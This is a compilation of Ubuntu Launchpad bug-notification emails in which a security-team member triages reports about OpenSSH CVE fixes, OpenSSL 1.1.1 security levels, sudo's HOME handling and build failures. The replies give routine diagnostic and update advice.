You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629



[Touch-packages] [Bug 1823422] Re: heimdal ftbfs in disco

2019-04-08 Thread Seth Arnold
Hmm, also ugly:

test-normalize.c: In function ‘main’:
test-normalize.c:159:49: warning: ‘__builtin___snprintf_chk’ output may be truncated before the last format character [-Wformat-truncation=]
  snprintf(longname, sizeof(longname), "%s/%s", srcdir, filename);
 ^
In file included from /usr/include/stdio.h:867,
 from test-normalize.c:37:
/usr/include/x86_64-linux-gnu/bits/stdio2.h:67:10: note: ‘__builtin___snprintf_chk’ output 2 or more bytes (assuming 257) into a destination of size 256
   return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
  ^~~~
__bos (__s), __fmt, __va_arg_pack ());
~

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to heimdal in Ubuntu.
https://bugs.launchpad.net/bugs/1823422

Title:
  heimdal ftbfs in disco

Status in Heimdal:
  New
Status in heimdal package in Ubuntu:
  New

Bug description:
  https://launchpadlibrarian.net/417925401/buildlog_ubuntu-disco-
  amd64.heimdal_7.5.0+dfsg-2.1_BUILDING.txt.gz

  =
 Heimdal 7.5.0: lib/hx509/test-suite.log
  =

  # TOTAL: 16
  # PASS:  15
  # SKIP:  0
  # XFAIL: 0
  # FAIL:  1
  # XPASS: 0
  # ERROR: 0

  .. contents:: :depth: 2

  FAIL: test_chain
  

  cert -> root
  cert -> root
  cert -> root
  sub-cert -> root
  sub-cert -> sub-ca -> root
  sub-cert -> sub-ca
  sub-cert -> sub-ca -> root
  sub-cert -> sub-ca -> root
  sub-cert -> sub-ca -> root
  max depth 2 (ok)
  max depth 1 (fail)
  ocsp non-ca responder
  ocsp ca responder
  ocsp no-ca responder, missing cert
  ocsp no-ca responder, missing cert, in pool
  ocsp no-ca responder, keyHash
  ocsp revoked cert
  ocsp print reply resp1-ocsp-no-cert
  ocsp print reply resp1-ca
  ocsp print reply resp1-keyhash
  ocsp print reply resp2
  ocsp verify exists
  ocsp verify not exists
  ocsp verify revoked
  crl non-revoked cert
  FAIL test_chain (exit status: 1)

  
  Testsuite summary for Heimdal 7.5.0
  
  # TOTAL: 16
  # PASS:  15
  # SKIP:  0
  # XFAIL: 0
  # FAIL:  1
  # XPASS: 0
  # ERROR: 0
  
  See lib/hx509/test-suite.log
  Please report to https://github.com/heimdal/heimdal/issues

To manage notifications about this bug go to:
https://bugs.launchpad.net/heimdal/+bug/1823422/+subscriptions



[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

2019-04-05 Thread Seth Arnold
Root, aha! We've finally uncovered the root of the problem. (Sorry. I
can't help myself. It's Friday afternoon.)

While Qualys' TLS scanner is a top-notch tool that I use regularly,
their "security scanner" is sadly not. They have built a tool that
checks version numbers. This is not ideal, because the clear majority of
Linux systems do not do wholesale version updates but instead backport
specific security fixes:

https://wiki.ubuntu.com/SecurityTeam/FAQ#Versions
https://www.debian.org/security/faq#version
https://wiki.centos.org/FAQ/General#head-3dad8cb98ac535185e58e882a23ca4b096cbff2f
https://access.redhat.com/security/updates/backporting

These sorts of security scanners would be more useful if everyone built
their entire systems from scratch.

Anyway, please ask Qualys to consider consuming our OVAL data:
https://people.canonical.com/~ubuntu-security/oval/
or parsing our database directly:
https://git.launchpad.net/ubuntu-cve-tracker

Both of these approaches would give better results. (There are tradeoffs
involved. They are welcome to contact us at secur...@ubuntu.com if they
would like to discuss the tradeoffs.)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629



[Touch-packages] [Bug 1823202] Re: HOME points to something not owned by user in sudo

2019-04-04 Thread Seth Arnold
You should use sudo -i to get a clean root login without your local user
configuration seeping into the shell.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1823202

Title:
  HOME points to something not owned by user in sudo

Status in sudo package in Ubuntu:
  New
Status in zsh package in Ubuntu:
  New

Bug description:
   You shouldn't use interactive shell, or any program with
  executable configuration, while your HOME points to something not
  owned by your user. That's the big issue and it's with sudo, not zsh,
  not omz, not any other shell or application you launch.  You
  can go shout "you are doing security wrong" at Ubuntu. Good luck.

  ╭─rkm@Khadas ~  
  ╰─➤  id rkm && getent passwd rkm
  uid=1001(rkm) gid=1001(rkm) groups=1001(rkm),0(root),4(adm),5(tty),6(disk),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),50(staff),60(games),100(users),101(systemd-journal),104(input),108(netdev),112(bluetooth),113(lpadmin),121(pulse-access)
  rkm:x:1001:1001:Ryan McKee:/home/rkm:/usr/bin/zsh

  ╭─rkm@Khadas ~  
  ╰─➤  sudo /usr/bin/env  1 
↵
  LC_MESSAGES=en_US.UTF-8
  LANG=en_US.UTF-8
  LANGUAGE=en_US.UTF-8
  TERM=xterm-256color
  XAUTHORITY=/home/rkm/.Xauthority
  COLORTERM=truecolor
  DISPLAY=:0.0
  PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  HOME=/home/rkm
  LC_CTYPE=en_US.UTF-8
  
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
  MAIL=/var/mail/root
  LOGNAME=root
  USER=root
  USERNAME=root
  SHELL=/bin/bash
  SUDO_COMMAND=/usr/bin/env

  
  SUDO_USER=rkm
  SUDO_UID=1001
  SUDO_GID=1001
  ╭─rkm@Khadas ~  
  ╰─➤  

   CyberManifest: sudo is a package. Also, once filed, add
  zsh to the bug since it could be a bug in zsh's package as well.

   Not necessarily zsh itself, but the packaging.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: sudo 1.8.21p2-3ubuntu1
  Uname: Linux 4.9.40 aarch64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: arm64
  CurrentDesktop: XFCE
  Date: Thu Apr  4 11:07:42 2019
  SourcePackage: sudo
  UpgradeStatus: No upgrade log present (probably fresh install)
  VisudoCheck:
   /etc/sudoers: parsed OK
   /etc/sudoers.d/README: parsed OK

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1823202/+subscriptions



[Touch-packages] [Bug 1823202] Re: HOME points to something not owned by user in sudo

2019-04-04 Thread Seth Arnold
This appears to be the missing context:

╭─rkm@Khadas ~  
╰─➤  sudo -s
[oh-my-zsh] Insecure completion-dependent directories detected:
drwxr-xr-x  11 rkm rkm  4096 Mar 30 19:19 /home/rkm/.oh-my-zsh
drwxr-xr-x 266 rkm rkm 12288 Mar 30 19:19 /home/rkm/.oh-my-zsh/plugins
drwxr-xr-x   2 rkm rkm  4096 Mar 30 19:19 /home/rkm/.oh-my-zsh/plugins/git

[oh-my-zsh] For safety, we will not load completions from these directories until
[oh-my-zsh] you fix their permissions and ownership and restart zsh.
[oh-my-zsh] See the above list for directories with group or other writability.

[oh-my-zsh] To fix your permissions you can do so by disabling
[oh-my-zsh] the write permission of "group" and "others" and making sure that the
[oh-my-zsh] owner of these directories is either root or your current user.
[oh-my-zsh] The following command may help:
[oh-my-zsh] compaudit | xargs chmod g-w,o-w

[oh-my-zsh] If the above didn't help or you want to skip the verification of
[oh-my-zsh] insecure directories you can set the variable ZSH_DISABLE_COMPFIX to
[oh-my-zsh] "true" before oh-my-zsh is sourced in your zshrc file.

from http://dpaste.com/1NQ618Y

** Information type changed from Private Security to Public

** Also affects: zsh (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1823202


[Touch-packages] [Bug 1797386] Re: [SRU] OpenSSL 1.1.1 to 18.04 LTS

2019-04-02 Thread Seth Arnold
Steve Langasek has pointed out that I missed the point of the bug.

I'm not comfortable with OPENSSL_TLS_SECURITY_LEVEL=0 in bionic. (Or,
indeed, in cosmic either.)

We shipped 18.04 LTS with OPENSSL_TLS_SECURITY_LEVEL=1, correct? I don't
recall seeing more than a handful of complaints about security parameter
mismatches over the last year. If anything, users are asking for tighter
defaults, not looser defaults.

I don't believe we should be downgrading the default security level as a
side effect of this transition.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1797386

Title:
  [SRU] OpenSSL 1.1.1 to 18.04 LTS

Status in openssl package in Ubuntu:
  In Progress
Status in libio-socket-ssl-perl source package in Bionic:
  New
Status in libnet-ssleay-perl source package in Bionic:
  New
Status in nova source package in Bionic:
  New
Status in openssl source package in Bionic:
  Confirmed
Status in python-cryptography source package in Bionic:
  New
Status in python2.7 source package in Bionic:
  New
Status in python3.6 source package in Bionic:
  New
Status in python3.7 source package in Bionic:
  New
Status in r-cran-openssl source package in Bionic:
  Fix Committed
Status in ruby-openssl source package in Bionic:
  Fix Committed
Status in ruby2.5 source package in Bionic:
  New

Bug description:
  [Impact]

   * OpenSSL 1.1.1 is an LTS release upstream, which will continue to
  receive security support for much longer than 1.1.0 series will.

   * OpenSSL 1.1.1 comes with support for TLS v1.3 which is expected to
  be rapidly adopted due to increased set of supported hashes & algoes,
  as well as improved handshake [re-]negotiation.

   * OpenSSL 1.1.1 comes with improved hw-acceleration capabilities.

   * OpenSSL 1.1.1 is ABI/API compatible with 1.1.0, however some
  software is sensitive to the negotiation handshake and may either need
  patches/improvements or clamp-down to maximum v1.2.

  [Test Case]

   * Rebuild all reverse dependencies

   * Execute autopkg tests for all of them

   * Clamp down to TLS v1.2 software that does not support TLS v1.3
  (e.g. mongodb)

   * Backport TLS v1.3 support patches, where applicable

  [Regression Potential]

   * Connectivity interop is the biggest issues which will be
  unavoidable with introducing TLS v1.3. However, tests on cosmic
  demonstrate that curl/nginx/google-chrome/mozilla-firefox connect and
  negotiate TLS v1.3 without issues.

   * Mitigation of discovered connectivity issues will be possible by
  clamping down to TLS v1.2 in either server-side or client-side
  software or by backporting relevant support fixes

   * Notable changes are listed here
  https://wiki.openssl.org/index.php/TLS1.3

   * Most common connectivity issues so far:
     - client verifies SNI in TLSv1.3 mode, yet client doesn't set hostname. Solution is client change to set hostname, or to clamp down the client to TLSv1.2.

     - session negotiation is different in TLSv1.3, existing client code
  may fail to create/negotiate/resume session. Clients need to learn how
  to use session callback.

   * This update bundles python 3.6 and 3.7 point releases

   * Following the change in Cosmic and up, this SRU also includes a
  distro patch that lowers OPENSSL_TLS_SECURITY_LEVEL from 1 to 0, to
  allow for establishing client->server server->client connections with
  lower grade security settings (e.g. sub-80bits keys, MD5/SHA1
  certificate checksums, and other crap like that). This is to continue
  allow bionic clients to connect to servers operating with older 1.0.x
  based openssl, as typically clients are at no mercy to reject servers
  that do not have any better certs/keys/signatures. Thus potentially
  weak-security connections that previously would fail to establish
  to/from bionic, may now be accepted. Some may view this as a
  regression. In that case adjust openssl.cnf to a higher
  TLS_SECURITY_LEVEL, or use the openssl ctx APIs to set a higher TLS
  security level. See further comments in this bug report as to when we
  will be raising this LEVEL up (currently timeline is to raise to 2, in
  20.04 LTS).

  [Other Info]

   * Previous FFe for OpenSSL in 18.10 is at
     https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1793092

   * TLS v1.3 support in NSS is expected to make it to 18.04 via
  security updates

   * TLS v1.3 support in GnuTLS is expected to be available in 19.04

   * Test OpenSSL is being prepared in
     https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3473

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1797386/+subscriptions



[Touch-packages] [Bug 1797386] Re: [SRU] OpenSSL 1.1.1 to 18.04 LTS

2019-04-02 Thread Seth Arnold
I'm slightly concerned about raising the TLS minimums in our next LTS
release without some exposure to it in the 19.10 release. But this plan
sounds better than waiting until 20.10 to raise the minimums -- and
19.10 may be too soon to take the step.

But we don't have to decide on 19.10 defaults just yet.

Thanks for the explanation on why the change wouldn't make sense to
backport to previous releases. Modifying enough applications to allow
downgrades where necessary would carry significant risk of regressions
for users.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1797386



[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

2019-04-01 Thread Seth Arnold
Root, version 1:7.6p1-4ubuntu0.1 included the fix for CVE-2018-15473.

Version 1:7.6p1-4ubuntu0.2 is included in the disc image
ubuntu-18.04.2-server-amd64:

$ sha256sum ubuntu-18.04.2-server-amd64.iso 
a2cb36dc010d98ad9253ea5ad5a07fd6b409e3412c48f1860536970b073c98f5  ubuntu-18.04.2-server-amd64.iso
$ bsdtar tf ubuntu-18.04.2-server-amd64.iso | grep openssh
pool/main/o/openssh
pool/main/o/openssh/openssh-client-udeb_7.6p1-4ubuntu0.2_amd64.udeb
pool/main/o/openssh/openssh-client_7.6p1-4ubuntu0.2_amd64.deb
pool/main/o/openssh/openssh-server-udeb_7.6p1-4ubuntu0.2_amd64.udeb
pool/main/o/openssh/openssh-server_7.6p1-4ubuntu0.2_amd64.deb
pool/main/o/openssh/openssh-sftp-server_7.6p1-4ubuntu0.2_amd64.deb
pool/main/o/openssh/ssh_7.6p1-4ubuntu0.2_all.deb

1:7.6p1-4ubuntu0.2 includes the fix from 1:7.6p1-4ubuntu0.1 and fixes three more CVEs:
- CVE-2018-20685
- CVE-2019-6109
- CVE-2019-6111

During the install, you have the option of downloading and installing updates.
These additional updates include openssh version 1:7.6p1-4ubuntu0.3, which
includes additional fixes for one CVE:
- CVE-2019-6111

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-20685

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-6109

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-6111

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

Title:
  CVE-2018-15473 - User enumeration vulnerability

Status in openssh package in Ubuntu:
  Fix Released
Status in openssh source package in Trusty:
  Fix Released
Status in openssh source package in Xenial:
  Fix Released
Status in openssh source package in Bionic:
  Fix Released
Status in openssh source package in Cosmic:
  Fix Released

Bug description:
  https://nvd.nist.gov/vuln/detail/CVE-2018-15473

  OpenSSH through 7.7 is prone to a user enumeration vulnerability due
  to not delaying bailout for an invalid authenticating user until after
  the packet containing the request has been fully parsed, related to
  auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.

  Fixed in Debian: https://www.debian.org/security/2018/dsa-4280

  Currently pending triage?
  https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-15473.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions



[Touch-packages] [Bug 1822370] Re: 19.04 beta openssh-client broken pipe

2019-03-29 Thread Seth Arnold
Hello,

Are there any messages in dmesg that look related? Can you ping those
hosts? Do you get ssh banners if you run:

echo "" | nc x.x.x.x 22

?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1822370

Title:
  19.04 beta openssh-client broken pipe

Status in openssh package in Ubuntu:
  New

Bug description:
  Upgrade to Xubuntu 19.04 beta from 18.10

  openssh-client

  when trying to ssh into another system, following error:

  packet_write_wait: Connection to x.x.x.x port 22: Broken pipe

  Problem is consistent on trying to connect to various systems.

  Can confirm was able to ssh prior to upgrade and can ssh into these
  systems from other systems.

  Can use putty on this system to ssh into these boxes as well.

  ProblemType: Bug
  DistroRelease: Ubuntu 19.04
  Package: openssh-client 1:7.9p1-9
  ProcVersionSignature: Ubuntu 5.0.0-8.9-generic 5.0.1
  Uname: Linux 5.0.0-8-generic x86_64
  ApportVersion: 2.20.10-0ubuntu23
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Fri Mar 29 13:36:38 2019
  InstallationDate: Installed on 2018-11-14 (135 days ago)
  InstallationMedia: Xubuntu 18.10 "Cosmic Cuttlefish" - Release amd64 (20181017.2)
  ProcEnviron:
   LANGUAGE=en_US
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  RelatedPackageVersions:
   ssh-askpass   N/A
   libpam-sshN/A
   keychain  N/A
   ssh-askpass-gnome N/A
  SSHClientVersion: OpenSSH_7.9p1 Ubuntu-9, OpenSSL 1.1.1b  26 Feb 2019
  SourcePackage: openssh
  UpgradeStatus: Upgraded to disco on 2019-03-29 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1822370/+subscriptions



[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

2019-03-29 Thread Seth Arnold
root, version 1:7.6p1-4ubuntu0.1 was published to the archive on
November 6th 2018:

https://launchpad.net/ubuntu/+source/openssh/1:7.6p1-4ubuntu0.1
https://lists.ubuntu.com/archives/bionic-changes/2018-November/017000.html
https://usn.ubuntu.com/3809-1/

A default configuration of Ubuntu 18.04 LTS with unattended-upgrades
installed would have received this update within the next 36 hours or
so. If you installed before November 6th, then you probably received the
update November 6th or 7th. If you installed after November 6th, then
you probably received the update during installation. You can check
/var/log/dpkg.log* files to find the exact date and time you received
the update.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions
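
The dpkg.log check suggested in the message above, as an added example (not part of the original thread and not Ubuntu tooling): it scans dpkg.log-format lines for the first time a package reached a version at or above the fixed 1:7.6p1-4ubuntu0.1, using Debian's version ordering rather than string comparison. The sample log lines are constructed, and the function names are hypothetical.

```python
import glob
import gzip
import re

FIXED_BIONIC = "1:7.6p1-4ubuntu0.1"  # fixed version named in the message above

# Constructed sample in dpkg.log format (not taken from a real system).
SAMPLE_LOG = """\
2018-10-02 09:14:02 status installed openssh-server:amd64 1:7.6p1-4
2018-10-02 09:14:03 status installed openssh-sftp-server:amd64 1:7.6p1-4
2018-11-07 06:31:47 startup archives unpack
2018-11-07 06:31:48 upgrade openssh-server:amd64 1:7.6p1-4 1:7.6p1-4ubuntu0.1
2018-11-07 06:31:48 status half-installed openssh-server:amd64 1:7.6p1-4
2018-11-07 06:31:49 status unpacked openssh-server:amd64 1:7.6p1-4ubuntu0.1
2018-11-07 06:31:50 configure openssh-server:amd64 1:7.6p1-4ubuntu0.1 <none>
2018-11-07 06:31:52 status installed openssh-server:amd64 1:7.6p1-4ubuntu0.1
2019-02-05 06:12:10 status installed openssh-server:amd64 1:7.6p1-4ubuntu0.2
""".splitlines()


def _order(c):
    """Sort weight of one non-digit character; '' means end of string."""
    if c == "" or c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1          # '~' sorts before everything, even end of string
    return ord(c) + 256    # punctuation sorts after letters


def _cmp_part(a, b):
    """Compare two upstream or revision strings the way dpkg does."""
    while a or b:
        na = re.match(r"[^0-9]*", a).group()
        nb = re.match(r"[^0-9]*", b).group()
        a, b = a[len(na):], b[len(nb):]
        for k in range(max(len(na), len(nb))):
            ca, cb = _order(na[k:k + 1]), _order(nb[k:k + 1])
            if ca != cb:
                return -1 if ca < cb else 1
        da = re.match(r"[0-9]*", a).group()
        db = re.match(r"[0-9]*", b).group()
        a, b = a[len(da):], b[len(db):]
        ia, ib = int(da or 0), int(db or 0)
        if ia != ib:
            return -1 if ia < ib else 1
    return 0


def compare_versions(a, b):
    """Return -1, 0 or 1 using Debian's [epoch:]upstream[-revision] ordering."""
    def split(v):
        epoch, sep, rest = v.partition(":")
        if not sep:
            epoch, rest = "0", v
        upstream, sep, revision = rest.rpartition("-")
        if not sep:
            upstream, revision = rest, ""
        return int(epoch), upstream, revision

    ea, ua, ra = split(a)
    eb, ub, rb = split(b)
    if ea != eb:
        return -1 if ea < eb else 1
    return _cmp_part(ua, ub) or _cmp_part(ra, rb)


def first_fixed(lines, package, fixed):
    """Earliest (timestamp, version) where package was installed at >= fixed."""
    hits = []
    for line in lines:
        f = line.split()
        # date time "status" "installed" name[:arch] version
        if len(f) == 6 and f[2] == "status" and f[3] == "installed":
            if f[4].split(":")[0] == package and compare_versions(f[5], fixed) >= 0:
                hits.append((f[0] + " " + f[1], f[5]))
    return min(hits) if hits else None


def read_dpkg_logs(pattern="/var/log/dpkg.log*"):
    """Collect lines from the current and rotated (optionally gzipped) logs."""
    lines = []
    for path in glob.glob(pattern):
        opener = gzip.open if path.endswith(".gz") else open
        with opener(path, "rt", errors="replace") as fh:
            lines.extend(fh.read().splitlines())
    return lines


if __name__ == "__main__":
    lines = read_dpkg_logs() or SAMPLE_LOG
    print(first_fixed(lines, "openssh-server", FIXED_BIONIC))
```

Because the timestamps sort lexically, the rotated logs can be read in any order.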



[Touch-packages] [Bug 1822335] Re: test general

2019-03-29 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1822335

Title:
  test general

Status in xorg package in Ubuntu:
  New

Bug description:
   test general. thank you

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: xorg 1:7.7+19ubuntu7.1
  ProcVersionSignature: Ubuntu 4.15.0-47.50-generic 4.15.18
  Uname: Linux 4.15.0-47-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Fri Mar 29 15:34:45 2019
  DistUpgraded: Fresh install
  DistroCodename: bionic
  DistroVariant: ubuntu
  GraphicsCard:
   Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] (rev 09) (prog-if 00 [VGA controller])
     Subsystem: Lenovo 3rd Gen Core processor Graphics Controller [17aa:21f3]
  InstallationDate: Installed on 2019-03-09 (19 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  MachineType: LENOVO 2349IP5
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-47-generic root=UUID=29ebe1d0-5356-4a16-ac13-b48aa7be1b2e ro quiet splash vt.handoff=1
  Renderer: Software
  SourcePackage: xorg
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 01/09/2013
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G1ET91WW (2.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 2349IP5
  dmi.board.vendor: LENOVO
  dmi.board.version: Win8 Pro DPK TPG
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: dmi:bvnLENOVO:bvrG1ET91WW(2.51):bd01/09/2013:svnLENOVO:pn2349IP5:pvrThinkPadT430:rvnLENOVO:rn2349IP5:rvrWin8ProDPKTPG:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.family: ThinkPad T430
  dmi.product.name: 2349IP5
  dmi.product.version: ThinkPad T430
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1
  version.libdrm2: libdrm2 2.4.95-1~18.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 18.2.8-0ubuntu0~18.04.2
  version.libgl1-mesa-glx: libgl1-mesa-glx 18.2.8-0ubuntu0~18.04.2
  version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20171229-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2
  xserver.bootTime: Fri Mar 22 09:18:08 2019
  xserver.configfile: default
  xserver.errors:
   open /dev/dri/card0: No such file or directory
   open /dev/dri/card0: No such file or directory
   Screen 0 deleted because of no matching config section.
   AIGLX: reverting to software rendering
  xserver.logfile: /var/log/Xorg.0.log
  xserver.outputs:
   
  xserver.version: 2:1.19.6-1ubuntu4.2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1822335/+subscriptions



[Touch-packages] [Bug 1794629] Re: CVE-2018-15473 - User enumeration vulnerability

2019-03-28 Thread Seth Arnold
root: sudo apt update && sudo apt upgrade

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1794629

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1794629/+subscriptions



[Touch-packages] [Bug 1807856] Re: During do-release-upgrade from 18.04 to 18.10: package lxd 3.0.2-0ubuntu1~18.04.1 failed to install/upgrade: new lxd package pre-installation script subprocess retur

2019-03-27 Thread Seth Arnold
I added apport for the python2 -> python3 bug.

Thanks

** Also affects: apport (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1807856

Title:
  During do-release-upgrade from 18.04 to 18.10: package lxd
  3.0.2-0ubuntu1~18.04.1 failed to install/upgrade: new lxd package
  pre-installation script subprocess returned error exit status 1

Status in apport package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  Confirmed

Bug description:
  [Impact]

  Upgrading apt version of lxd to snap version during do-release-upgrade
  failed.

  I attempted to update my ubuntu server 18.04 system to 18.10 as root:

  apt update
  apt dist-upgrade -y
  apt autoremove -y
  do-release-upgrade

  I have an existing LXD installed via apt, and running containers.

  It asked me which snap LXD to upgrade to, and I selected "latest".

  Console log:

  ==> Installing the LXD snap from the latest track for ubuntu-18.10
  error: cannot perform the following tasks:
  - Run install hook of "lxd" snap if present (run hook "install": cannot perform operation: mount /var/lib/snapd/hostfs/var/lib/lxd /var/lib/lxd -o nosuid,nodev,noexec,rbind,rslave: Permission denied)
  dpkg: error processing archive /tmp/apt-dpkg-install-gdCSiW/32-lxd_1%3a0.4_all.deb (--unpack):
   new lxd package pre-installation script subprocess returned error exit status 1
  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/apt/cache.py", line 265, in __getitem__
      rawpkg = self._cache[key]
  KeyError: '32-lxd'

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/apport/packaging_impl.py", line 126, in _apt_pkg
      return self._cache()[package]
    File "/usr/lib/python3/dist-packages/apt/cache.py", line 267, in __getitem__
      raise KeyError('The cache has no package named %r' % key)
  KeyError: "The cache has no package named '32-lxd'"

  During handling of the above exception, another exception occurred:

  Traceback (most recent call last):
    File "/usr/share/apport/package_hook", line 48, in <module>
      pr['SourcePackage'] = apport.packaging.get_source(options.package)
    File "/usr/lib/python3/dist-packages/apport/packaging_impl.py", line 159, in get_source
